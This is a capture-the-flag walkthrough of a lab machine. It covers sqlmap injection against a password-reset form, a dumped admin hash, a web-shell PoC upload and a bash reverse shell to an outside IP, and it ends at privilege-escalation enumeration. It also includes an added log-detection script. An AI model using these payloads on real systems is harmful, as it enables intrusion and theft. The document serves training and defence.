Proof of Concept

10.129.13.49

Nmap

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Initial Access

Accessing the web service on port 80 redirects to http://usage.htb

80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Edit the /etc/hosts file

┌──(kali㉿kali)-[~/Usage]
└─$ cat /etc/hosts
<SNIP>
10.129.13.49    usage.htb

After visiting http://usage.htb, an SQL injection vulnerability was found in the email parameter of the /forget-password endpoint

  • Payload: email=kalionix@gmail.com' and '1'='2

Extract the database list with sqlmap

  • information_schema
  • performance_schema
  • usage_blog

┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 --dbs --batch --technique=B --threads=10
 
<SNIP>
 
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
18
[06:53:18] [INFO] retrieved: information_schema
[06:53:18] [INFO] retrieving the length of query output
[06:53:18] [INFO] retrieved: 18
[06:53:56] [INFO] retrieved: performance_schema
[06:53:56] [INFO] retrieving the length of query output
[06:53:56] [INFO] retrieved: 10
[06:54:18] [INFO] retrieved: usage_blog
available databases [3]:
[*] information_schema
[*] performance_schema
[*] usage_blog
 
[06:54:18] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 162 times
[06:54:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/usage.htb'
 
[*] ending @ 06:54:18 /2026-02-05/

Extract the table list from the usage_blog database

┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 -D usage_blog --tables --batch --technique=B --threads=10 -v 0
 
<SNIP>
 
Database: usage_blog
[15 tables]
+------------------------+
| admin_menu             |
| admin_operation_log    |
| admin_permissions      |
| admin_role_menu        |
| admin_role_permissions |
| admin_role_users       |
| admin_roles            |
| admin_user_permissions |
| admin_users            |
| blog                   |
| failed_jobs            |
| migrations             |
| password_reset_tokens  |
| personal_access_tokens |
| users                  |
+------------------------+
 

Dump the admin_users table to obtain the administrator password hash

┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 -D usage_blog -T admin_users --batch --technique=B --threads=10 -v 0 --dump
[*] starting @ 07:06:08 /2026-02-05/
 
got a 302 redirect to 'http://usage.htb/forget-password'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: _token=IeUU6YdYAotb4xXvIL9RXvbkjp1jQGPif7OSuY5t&email=kalionix@htb.com' AND 3539=(SELECT (CASE WHEN (3539=3539) THEN 3539 ELSE (SELECT 9466 UNION SELECT 9518) END))-- RckG
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL < 5.0.12
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
Database: usage_blog
Table: admin_users
[1 entry]
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| id | name          | avatar  | password                                                     | username | created_at          | updated_at          | remember_token                                               |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| 1  | Administrator | <blank> | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 | admin    | 2023-08-13 02:48:26 | 2023-08-23 06:02:19 | kThXIKu7GhLpgwStz7fCFxjDomCYS1SmPpxwEkzv1Sdzva0qLYaDhllwrsLT |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
Add the admin domain to /etc/hosts and open the admin page, then log in with the previously obtained credentials (admin/whatever1)

┌──(kali㉿kali)-[~/Usage]
└─$ cat /etc/hosts
<SNIP>
10.129.13.49    usage.htb	admin.usage.htb

Check the Laravel service version in the admin panel

  • Laravel 10.18.0

This version is affected by a file upload vulnerability (CVE-2023-24249)

Download the PoC

┌──(kali㉿kali)-[~/Usage]
└─$ git clone https://github.com/ldb33/CVE-2023-24249-PoC.git
Cloning into 'CVE-2023-24249-PoC'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 4 (delta 0), reused 4 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (4/4), done.

Running the PoC uploads the web shell

┌──(kali㉿kali)-[~/Usage/CVE-2023-24249-PoC]
└─$ python CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/shell.php

Use the web shell to execute the reverse shell command

┌──(kali㉿kali)-[~/Usage/CVE-2023-24249-PoC]
└─$ curl http://admin.usage.htb/uploads/images/shell.php --data-urlencode 'c=bash -c "sh -i >& /dev/tcp/10.10.14.17/4444 0>&1"'
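Both the blind SQL injection against /forget-password and the web shell under /uploads/images/ leave traces in the nginx access log. The following Python script is an added example, not part of the original write-up, that flags three such signals over constructed sample log lines: repeated 5xx responses on /forget-password (sqlmap reported 162 of them during the run above), a sqlmap User-Agent, and a server-side script requested under /uploads/. The "combined" log format, the threshold and the sample lines are assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample nginx access log lines (not captured from the target).
SAMPLE_LOG = """\
10.10.14.17 - - [05/Feb/2026:06:53:18 +0000] "POST /forget-password HTTP/1.1" 500 1234 "-" "sqlmap/1.9.12#stable (https://sqlmap.org)"
10.10.14.17 - - [05/Feb/2026:06:53:19 +0000] "POST /forget-password HTTP/1.1" 500 1234 "-" "sqlmap/1.9.12#stable (https://sqlmap.org)"
10.10.14.17 - - [05/Feb/2026:06:53:20 +0000] "POST /forget-password HTTP/1.1" 302 0 "-" "sqlmap/1.9.12#stable (https://sqlmap.org)"
10.10.14.17 - - [05/Feb/2026:07:10:02 +0000] "POST /uploads/images/shell.php HTTP/1.1" 200 512 "-" "curl/8.5.0"
10.10.14.50 - - [05/Feb/2026:07:11:00 +0000] "GET /uploads/images/avatar.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Default nginx "combined" log format (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text, error_threshold=2):
    """Return {source_ip: [finding, ...]} for the three signals described above."""
    findings = defaultdict(list)
    reset_errors = Counter()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, status, ua = rec["ip"], int(rec["status"]), rec["ua"]
        path = rec["path"].split("?", 1)[0]
        # 1. Blind SQLi probing of the reset form tends to produce bursts of 5xx responses.
        if path == "/forget-password" and status >= 500:
            reset_errors[ip] += 1
            if reset_errors[ip] == error_threshold:
                findings[ip].append("repeated 5xx on /forget-password")
        # 2. sqlmap's default User-Agent identifies itself (easily spoofed, but cheap to check).
        if ua.lower().startswith("sqlmap") and "sqlmap user-agent" not in findings[ip]:
            findings[ip].append("sqlmap user-agent")
        # 3. A server-side script under an upload directory should never be requested at all.
        if path.startswith("/uploads/") and path.lower().endswith((".php", ".phtml", ".phar")):
            findings[ip].append(f"script under uploads: {path}")
    return dict(findings)


if __name__ == "__main__":
    for ip, hits in analyze(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(hits))
```

Pointing the script at a real access.log (one line per request, same format) is a matter of replacing SAMPLE_LOG with the file contents; the threshold should be raised well above 2 for production traffic.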

Reverse shell connection established

┌──(kali㉿kali)-[~/Usage]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.13.49] 56108
sh: 0: can't access tty; job control turned off
$

Read user.txt

$ cat user.txt
0baf85aa040a729f07b27184111498fd
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.13.49  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 fe80::250:56ff:feb0:1ad2  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb0:1ad2  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b0:1a:d2  txqueuelen 1000  (Ethernet)
        RX packets 140926  bytes 34253458 (34.2 MB)
        RX errors 0  dropped 1  overruns 0  frame 0
        TX packets 99260  bytes 43958330 (43.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 454565  bytes 50400087 (50.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 454565  bytes 50400087 (50.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Privilege Escalation

lse enumeration

[!] st020 Uncommon setuid binaries........................................ yes!
---
/snap/snapd/20290/usr/lib/snapd/snap-confine
/snap/snapd/19993/usr/lib/snapd/snap-confine
---